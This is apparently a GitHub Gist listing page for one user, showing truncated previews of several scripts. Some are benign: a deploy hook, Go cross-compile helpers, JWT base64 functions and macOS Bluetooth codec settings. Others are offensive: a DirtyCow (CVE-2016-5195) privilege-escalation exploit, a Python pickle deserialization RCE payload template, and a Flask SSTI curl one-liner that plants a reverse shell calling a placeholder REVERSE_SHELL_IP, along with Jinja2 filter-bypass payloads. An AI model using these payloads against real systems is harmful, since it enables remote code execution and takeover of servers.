koalr zema1

@zema1
zema1 / post-receive.sh
Created November 21, 2016 07:43 — forked from icyleaf/post-receive.sh
git autodeploy script when it matches the string "[deploy]"
#!/bin/sh
#
# git autodeploy script when it matches the string "[deploy]"
#
# @author icyleaf <icyleaf.cn@gmail.com>
# @link http://icyleaf.com
# @version 0.1
#
# Usage:
# 1. put this into the post-receive hook file itself below
@zema1
zema1 / golang-cross-compiling.sh
Last active March 14, 2018 01:52
golang-cross-compiling.sh
#!/usr/bin/env bash
# https://www.digitalocean.com/community/tutorials/how-to-build-go-executables-for-multiple-platforms-on-ubuntu-16-04
package=$1
if [[ -z "$package" ]]; then
  echo "usage: $0 <package-name>"
  exit 1
fi
package_split=(${package//\// })
@zema1
zema1 / c0w.c
Created April 9, 2018 05:31 — forked from KrE80r/c0w.c
PTRACE_POKEDATA variant of CVE-2016-5195
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
@zema1
zema1 / flask_ssti_rce.sh
Last active July 20, 2018 05:55
Flask SSTI RCE
curl 'localhost:8088/?next={{request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[6]],request.headers[request.headers.keys()[6]][5]).write(request.headers[request.headers.keys()[4]])}}{{config.from_pyfile(request.headers[request.headers.keys()[6]])}}' -g -H "x-f: /tmp/w" -H 'x-p: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("REVERSE_SHELL_IP",REVERSE_SHELL_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
When __class__ and __subclasses__ are filtered:
{% raw %}{{[].__getattribute__('__cla'+'ss__').__base__.__getattribute__([].__getattribute__('__cla'+'ss__').__base__,'__subclas'+'ses__')()[40]('/opt/flag_b420e8cfb8862548e68459ae1d37a1d5.txt','r').__getattribute__('r'+'ead')()}} {% endraw %}
For more filter bypasses, see https://0day.work/jinja2-template-injection-filter-bypasses/
http://localhost:5000/?exploit={%set%20a,b,c,d,e,f,g,h,i%20=%20request|attr((request.args.usc*2,request.args.
@zema1
zema1 / jwt_base64_url.py
Last active July 20, 2018 06:47
simple jwt token encode and decode
def base64_url_encode(text):
    return base64.b64encode(text).replace('+', '-').replace('/', '_').replace('=', '')
def base64_url_decode(text):
    text = text.replace('-', '+').replace('_', '/')
    while True:
        try:
            result = base64.b64decode(text)
@zema1
zema1 / pickle-payload.py
Created August 1, 2018 10:07 — forked from mgeeky/pickle-payload.py
Python's Pickle Remote Code Execution payload template.
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with the command to execute as its first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import os
import sys
@zema1
zema1 / enable_aptx_aac_macos.sh
Last active September 1, 2020 14:47 — forked from marnovo/enable_aptx_aac_macos.sh
Enable AptX and AAC codecs on macOS
# (c) 2018 Marcelo Novaes
# License - MIT
# Enable AptX and AAC codecs on bluetooth connections on macOS
sudo defaults write bluetoothaudiod "Enable AptX codec" -bool true
sudo defaults write bluetoothaudiod "Enable AAC codec" -bool true
# default is 128, you can change to higher
sudo defaults write bluetoothaudiod "AAC Bitrate" 128
import asyncio
import functools
import random
from multiprocessing import Manager
from aiomultiprocess import Pool
from aiomultiprocess.types import Queue
async def work(q: Queue, sleep_time: int):